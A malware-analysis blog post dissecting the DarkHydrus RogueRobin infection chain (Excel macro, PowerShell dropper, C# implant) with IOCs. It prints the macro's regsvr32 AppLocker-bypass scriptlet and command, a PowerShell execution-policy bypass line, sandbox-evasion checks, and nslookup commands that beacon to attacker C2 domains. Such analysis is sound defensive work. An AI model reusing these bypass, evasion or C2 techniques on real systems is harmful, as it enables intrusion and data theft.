Malware Analysis

Analyzing the “New” Tools of DarkHydrus

You may remember I wrote about the DarkHydrus APT a while ago, and how their Powershell malware, RogueRobin, was being used to target Middle Eastern organizations and exfiltrate data through the usage of DNS. They have resurfaced after a dormant period, bringing an newly improved and compiled version of RogueRobin discovered by Unit 42, containing a modified communication method – instead of communication over DNS, this C# version of RogueRobin utilizes Google Drive for communicating with it’s C2 servers.

I will be examining the three stages in this particular infection routine (Excel Document-> Powershell Script-> RogueRobin) and explaining how each stage functions. As per usual, the first and third stages have been uploaded to VirusBay. Let’s get analyzing.

First Stage: Excel Document (MD5): 89e50d52e498c34f1e976cf9a1017a39

The first stage of this infection routine begins with an Excel Document, which unsurprisingly contains malicious macros. The Excel Document reference in this analysis is completely blank, possibly giving the receiving user the impression that macros need to be enabled to view the content. Upon clicking Enable Macros, the macro Workbook_Open() is called, which simply calls the only other macro that is embedded within this document – New_Macro().

Briefly scanning the contents of New_Macro(), we can see there is a Powershell Script being stored in the variable str. Next, a WScript.Shell object is created, which is used to get the full path to %TEMP%. The filename \WINDOWSTEMP.ps1 is then appended to the %TEMP% path. Next, a Scripting.FileSystemObject is created, and the text file %TEMP%\WINDOWSTEMP.ps1 is created. Next, the data stored in str is written to the newly created file.

The macro then creates a powershell command that executes a file, passing the path to the newly created file as an argument to it.

powershell.exe -noexit -exec bypass -File %TEMP%\\WINDOWSTEMP.ps1

Next, the macro creates a Script Component File that is located in the %TEMP% directory, with the filename 12-B-366.txt. The following data is written to the text file.

<?XML version=""1.0""?>
<scriptlet>
<registration progid = ""PoC"" classid=""{F0001111-0000-0000-0000-0000FEEDACDC}"" >
<script language=""JScript"">
<![CDATA[ var r = new ActiveXObject(""WScript.Shell"").Run(""" + powershell_command + """,0,true); ]]>
</script>
</registration>
</scriptlet>

In the file, powershell_command refers to the command formed that executes WINDOWSTEMP.ps1. Once this file has been written to %TEMP%, the macro performs an AppLocker (a whitelisting program) Bypass. It does so by executing the command:

regsvr32.exe /s /n /u /i:%TEMP%\\12-B-366.txt scrobj.dll

regsvr32.exe is able to execute 12-B-366.txt due to the fact that it is a Script Component File. This bypass was discovered by Casey Smith (@subTee), and this works as a result of the code in the <registration> executing when you call regsvr32.exe. You can find a lot more about it here. As regsvr32.exe is a legitimately signed Microsoft binary, it is highly unlikely that it is blacklisted. Interestingly enough, this script DarkHydrus utilizes is almost a carbon copy of the PoC produced by Casey – they simply altered what was being executed.

Now we have an understanding of the first stage used by DarkHydrus to gain a foothold into organizations, let’s check out the Powershell script written to WINDOWSTEMP.ps1.

Second Stage: Powershell Script

As seen in the macros, the powershell script contains a large chunk of Base64 encoded data, which is also compressed using GZIP. Scrolling to the bottom of the script, we can see that $byteArray is being filled with the Base64 decoded data, and then being stored in a new memory stream. GZIP Decompression is then performed on the new memory stream, with the result being copied to the memory stream $output, which is converted to an array and stored in $byteOutArray. The data is then written to $env:APPDATA\Microsoft\Windows\Templates\, under the filename WindowsTemplate.exe, before being executed by iex.

Once the file has been executed, a shortcut is created and stored in the Startup folder, under the name OneDrive.lnk, and as a result we can determine this is the persistence mechanism used for RogueRobin.

So, we know how the script works, but we haven’t yet seen the executable that is extracted, because it’s encoded and compressed. We can easily extract the payload using Python. All you need to do is copy the encoded data to a new file, and run the following script:

import gzip, base64

f = open("payload.bin", "r+")
encoded = f.read()
decoded = base64.b64decode(encoded)
f.seek(0)
f.write(decoded)
f.truncate()
f1 = gzip.open("payload.bin", "rb")
decompressed = f1.read()
f1.close()
f.seek(0)
f.write(decompressed)
f.truncate()
f.close()

Once you have run the script, you should be left with a .NET executable – which is the final stage of the infection; RogueRobin.

Final Stage: RogueRobin EXE (MD5): c3b1bd4e3e159591d84e77452a09851d

Compared to the original Powershell RogueRobin, not much has changed except for the communication method, and the fact that it has been written in C#. As a result, I will be using dnSpy to statically analyze this payload. Interestingly enough, the compilation name for this executable was DNSProject.exe.

In this binary, the first function to be executed is Main(). This function checks if the predefined variable sandboxEvision_controler is True, which in this sample it is not. If it is True, the function sandBoxEvasion() is executed. It then checks to see if the next predefined variable hasStartup is True, which, again, is set to False. If it is True, the function startup() is called. Next, queryTypesTest() is called, passing 3 arguments; “ALL”, “2”, and 120. Finally, handler() is called, before the program exits.

sandBoxEvasion()

This function utilizes WMI in order to gather system information to determine if the malware is running in a sandbox or virtual machine. In order to do so, it contains several plaintext gwmi commands, just like the original RogueRobin, which is then executed in a function called powershell(), which simply executes the command and returns the standard output. If the malware detects it is running in a VM or sandbox, it will exit immediately. The different checks that are performed can be seen below.

1. Checks SMBIOSBIOSVERSION to see if it contains these strings:
        - VBOX
        - bochs
        - qemu 
        - VirtualBox
        - VM
        - XEN
2. Checks win32_computersystem to see if it matches "VMWare"
3. Checks to see if the TotalPhysicalMemory is larger than 2900Mb
4. Checks to see if the number of cores is higher than 1
5. Checks to see if Wireshark or SysInternals are running
6. Checks to see if Debugger is attached

If all checks are successful and there are no traces of a sandbox or virtual machine, the function simply returns.

Startup()

This function simply performs what the second stage performed – it copies itself to the %APPDATA% folder under the name OneDrive.exe, and then creates OneDrive.lnk in the Startup folder, which points to OneDrive.exe. As the second stage already performed this, we can assume that that is why the variable hasStartup() was set to False.

queryTestTypes()

The third argument, named waiting, in this function determines whether or not the program will exit – if it is higher than 7200, the program will exit. The first argument is compared to the string “ALL” – if it matches, the malware will loop through each DNS query type (TXT, SOA, MX, CNAME, SRV, A, AC, AAAA) and attempt to contact it’s C2 servers. In order to do this, it calls the function query(). A check is done to see if the variable ID contains any data, and if the length is equal to 2. If it is, query() is called with the first argument being a string that is formed based off of the program ID, which is converted to a string. To do so, the ID is converted to a string using the function number_to_word(), which converts the numbers 0-9 to letters:

NumbersLetter Representation
0h
1i
2j
3k
4l
5m
6r
7o
8p
9q

The letter b is prepended to the created string, and the letter c is appended to the string. If the ID is shorter than 2, the malware retrieves the current process ID (which is converted to a string, just like the program ID), and query() is called with the created string having the letter a prepended to the string. Therefore, the resulting string could look like this; amkjc.

The return value from query() is stored in the variable text3. This is checked against the string $$FALSE$$, and if it matches, the query type is added to an array in the format {query_type}:0. If text3 doesn’t equal $$FALSE$$, the query type is added to the array in the format {query_type}:1. Next, a check is done once again for the length of the program ID. If it is less than 1, the function magic() is called, with the argument being getid.

Once the malware has finished looping over each query type, it checks the length of the ID once again. If it is still less than 2, it indicates that no connections to the C2 servers were successful, so it calls queryTestTypes() once again, except it multiplies the value in the third argument, waiting, by 2. This function will be executed a total of 6 times – the value of waiting will be higher than 7200, and so the program will exit.

The last query type used that resulted in a successful connection will be set as the default, and stored in the global variable mode. The function spliting() is called, with the first argument being the return value of myInfo(). It is then called once more, passing the list of tested query types as the first argument. The function will then return back to the main function.

query()

This function is responsible for all of the DNS communication to the C2 servers. The second argument that query() accepts is the query type to use. The third and fourth arguments are bools, so they are either True or False. The third argument determines whether the malware is just testing connections to the C2 servers, or exfiltrating data to a selected server. The fourth argument determines whether the malware should use a specific DNS query type for communication, or to change it up on the fly, using the round_robin() function, which as you may have guessed, is where the name RogueRobin came from.

Before DNS communication begins, RogueRobin executes the following command to flush the DNS cache:

ipconfig /flushdns

Once the command has been executed, the malware executes the round_robin() function, passing the list of C2 domains as the first argument, and the current selected domain as the second argument. Before this function has been called, the current selected domain is equal to the first entry in the domain list. The list of C2 domains embedded in this sample can be seen below.

C2 Domains (in same order as the sample):
	- 0ffice365.agency
	- 0nedrive.agency
	- corewindows.agency
	- microsoftonline.agency
	- onedrive.agency
	- sharepoint.agency
	- skydrive.agency
	- 0ffice365.life
	- 0ffice365.services
	- skydrive.services

Next, if change_mode (fourth argument) is true, round_robin() is executed, and the query type is changed based on the return value. The possible queries can be seen below.

DNS Queries (in same order as the sample):
	- TXT
	- SOA
	- MX
	- CNAME
	- SRV
	- A
	- AC (AC is not a valid query type, and is used to request a subdomain using the A query type)
	- AAAA

From there, RogueRobin checks to see if the query type is AC, and if it is, the global variable useAC is set to true, and the query type is set to A.

The variable text3 can contain 1 of 3 commands that will be executed by the powershell() function. In order to communicate over DNS, just like the last version of RogueRobin, nslookup.exe is utilized, which is a legitimate Windows binary. All 3 commands can be seen below.

Regular Query: nslookup.exe -timeout=10 -q=MX amkjc.0ffice365.agency
If useAC = True: nslookup.exe -timeout=10 -q=MX amkjc-dj.0ffice365.agency
If Debugger is attached: nslookup.exe -timeout=10 -q=MX 676f6f646c75636b.ac.gogle.co

Interestingly enough, converting the string 676f6f646c75636b from hex will reveal the string goodluck, as if the authors behind the malware were leaving a note for any analysts reversing the sample, as this section of code will only trigger if a debugger is attached to the sample.

Next, the command stored in text3 is executed, with the returned data being stored in text. This data is then analyzed to see if any of the cancel_domains appear – these domains are listed below. If any matches are discovered, the string cancel will be returned.

Cancel Domains:
	- 216.58.192.174 
	- 2a00:1450:4001:81a::200e
	- 2200::
	- download.microsoft.com
	- ntservicepack.microsoft.com
	- windowsupdate.microsoft.com
	- update.microsoft.com

If the function hasn’t exited, another 2 Regex tests will be performed, firstly checking if there is a match between the response and the strings timeout, UnKnown can and Unspecified error, and secondly checking if there is a match between the response and the strings canonical name, mx, namerserver, mail server and address. If there is a match found on the first regex test, the variable flag (automatically set to true after receiving a response) is set to False. If there is a match found on the second regex test, flag is set to True.

If the third argument (is_test) is True and flag is false, the function will break from the loop and return $$FALSE$$. If it has not returned, the function checks to see if a debugger is present once again, and if it is, flag is set to False and the loop continues. If flag is set to True, it will return the response in lower case.

round_robin()

This function simply iterates over a list by getting the index of a string in an array, and then increments that index by 1. Next, the incremented value is compared against the size of the array, and if the incremented value is larger or equal to the size of the array, it is set to 0. The return value is array[incremented value], where array is the first argument, and incremented value is the index of the second argument plus 1.

myInfo()

This function is responsible for retrieving system information to send back to the C2 server. It first gathers the internal IP Address, before getting the domain which the computer is located on using WMI commands. Next, it gets the username of the current user, and the host name of the computer. Finally, it checks the privileges of the user. The string is concatenated together, resulting in a string that looks similar to the one below.

127.0.0.1|WORKGROUP|Username|Hostname|False|0|0|1|3|25|cs

The functions I have mentioned are the functions that are quite important in this binary – now I have gone over them, I will be focusing on the Google Drive C2 communications that RogueRobin uses. If you want to know more about the other functions that I haven’t mentioned, you can check out my old post here on their Powershell variant of RogueRobin. You can also check out Unit 42’s (the group that discovered this new variant) great analysis on this C# variant here.

Google Drive Capabilities

tl;dr:
- gat() - Get OAuth 2.0 Access Token
- gdd() - Download File from Google Drive
- gdmd_t() - Get Last Modified Time from File
- gdr() - Delete File from Google Drive
- gd_u() - Modify Existing File
- gd_uu() - Create New File and Upload Data to it

Since the previous powershell variant, a new command has been added to the command handler – \^$x_mode. The global variable x_mode is set as False by default, however upon receiving the x_mode command over DNS, the malware will set x_mode as True, and as a result, communications will occur through Google Drive rather than over DNS. Alongside the \^$x_mode command, 7 values will be included in the string, which are split with \r, \n, or \r\n. If the second item in this array (the split string) is equal to OFF, the malware returns back to using DNS for communication – otherwise, the second value is stored in the global variable gdu.

In order to figure out what each variable is used for, we can simply CTRL+F the variable we are looking at to find other instances of it. For example, the variable gdu is used in the function gdmd_t(), which calls WebClient.DownloadData(), and checks to see when the file was modified last using a regex query on the response data. This time is then returned back to the calling function. In this function, gdu is being used as the Drive URL, and so array[1] is equal to the Google Drive URL.

The variable gduu is used in the function gd_uu(), which calls WebClient.UploadData() twice. The first time, it is passing gduu as the first argument, and bytes2 as the second argument. bytes2 contains the variable file_name, and the response of calling UploadData() is stored in the variable address – which is then passed as the first argument in the second call to UploadData(). Based on this, we can determine that first the malware sends a request to Google Drive to create a file (file_name) in the drive (gduu), to which Google Drive responds with information including the URL to that file. This URL is then used to upload the data to that file.

The next variable is gdo2t, which is used in the function gat(). When looking through this function, it is clear that it has something to do with an access token, as the response from WebClient.UploadValues() is stored in the variable ac_t, only after a Regex check for access_token has been performed. We can simply google google drive access token to find out that Google Drive allows API access using OAuth 2.0 tokens – then take another look at the variable name: google drive oauth 2.0 tokens. So this function simply retrieves the OAuth 2.0 Token in order to utilize the Google Drive API. Therefore, gdo2t contains the Drive URL to retrieve the token.

The next variable, client_id, is also used in the function gat(). This is added to the POST data that is sent to the URL in order to get the OAuth Token. This is the same for the variable cs, which contains the client secret for the application – which is created alongside the client ID when the authors of this malware registered for API access using the Google API Console – and the variable r_t, which contains the refresh token. This refresh token allows the malware to get new access tokens when the previous one has run out. You can learn more about Google API here.

Finally, the last variable to be filled is gdue. This is used in the function gd_u(), which is different to gd_uu(), as it updates an existing file, rather than creating a brand new one. gdue contains the URL to the drive to update, and then the variable file_id is appended to the URL, to get access to a specific file. The malware then simply calls WebClient.UploadData() after retrieving the file location URL from the headers of the Google Drive response.

Now to look at any functions involved in the Google Drive communications that I haven’t mentioned.

gdr()

gdr() is used to delete a file based on the file ID passed to it. It sends a DELETE request to Google Drive, passing the URL to the file that will be deleted.

gdd()

gdd() is used to download a file from Google Drive, accepting the file ID as the only argument. Unlike gdmd_t(), this function returns the downloaded data, instead of the modified time.

Now we know what each function does, we can easily understand how the handler() function operates.

If x_mode is set to True, this will execute. First, gat() is called, which will retrieve the OAuth 2.0 Token so that communications with Google Drive can begin. Next, the malware checks to see if the global variable f_id is empty or not. If it is empty, gd_uu() is called, which will create a file using the process ID, with the .txt extension. The data uploaded to this file contains the process ID as a string and the currently selected domain from the C2 list.

gd_uu() returns the file ID of the newly created file, which is stored in f_id. Next, the variable modification_time is filled with the return value of gdmd_t(), which is the time the last modification was made to the file.

Next, update_f_id is checked to see if it is empty or not. If it is, gd_uu() is called again, except this time the data that is written the the file is simply the process ID, and the filename is simply the process ID plus -U.txt. The return value is then stored in update_f_id.

If update_f_id or f_id are equal to ERROR, gdr() is called to delete the file with the ID in f_id, and then to delete the file with the ID in update_f_id. These variables are then emptied, and the variable x_mode_error is incremented. If the value in this variable is more than 10, x_mode is set to False, meaning the communication methods resort back to DNS. The loop jumps back to the start.

If f_id and update_f_id do not equal ERROR, the loop resumes. The program calls gdmd_t() once again, storing the result in text3. This is then compared against the value in modification_time. If they match, gd_u() is called, with the second argument (the file ID to update) being update_f_id. An example of the data that is uploaded to the file can be seen below:

"b" + ID + "c" + 5 Random Characters + Current Domain

The loop then jumps back to the start. If the modification time has changed, modification_time is filled with the time in text3 and the file (ID: f_id) is downloaded using gdd(). The downloaded data is compared against the value ERROR. If it matches, x_mode_error is incremented, and once again, it is checked to see if it is larger than 10. If it is, x_mode is set to false, and the loop starts again. If they don’t match, the program begins to parse this command using several regex queries, before calling taskHandler() to execute the received command.

So that brings this analysis to a close – due to a slight change in plans, my post on ISFB will be released sometime in February (hopefully in the first or second week), along with another post I have been working on. As always, if you have any questions about this post or anything malware analysis related, don’t hesitate to contact me either through the site or on Twitter (@0verfl0w_). Also, if you want to be the first to know about any new posts that go public, make sure to subscribe below! Thanks again!

Want to be the first to see new posts? Subscribe now!

* indicates required
IOCs:
    - Hashes (MD5):
        - First Stage (Excel): 89e50d52e498c34f1e976cf9a1017a39
        - Final Stage (RogueRobin):c3b1bd4e3e159591d84e77452a09851d
    - Dropped Files:
        - %TEMP%\\WINDOWSTEMP.ps1
        - %TEMP%\\12-B-366.txt
        - %APPDATA%\\Microsoft\\Windows\\Templates\\WindowsTemplate.exe
        - %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\OneDrive.lnk
    - C2 Servers:
	- 0ffice365.agency
	- 0nedrive.agency
	- corewindows.agency
	- microsoftonline.agency
	- onedrive.agency
	- sharepoint.agency
	- skydrive.agency
	- 0ffice365.life
	- 0ffice365.services
	- skydrive.services
    - Cancel Domains:
	- 216.58.192.174 
	- 2a00:1450:4001:81a::200e
	- 2200::
	- download.microsoft.com
	- ntservicepack.microsoft.com
	- windowsupdate.microsoft.com
	- update.microsoft.com

Author

0verfl0w_

The Remastered
Beginner Malware Analysis Course

Pre-registration is now open

Don’t miss out! Add your email to get notified of course updates, and grab a 15% discount as well as 1-week early access!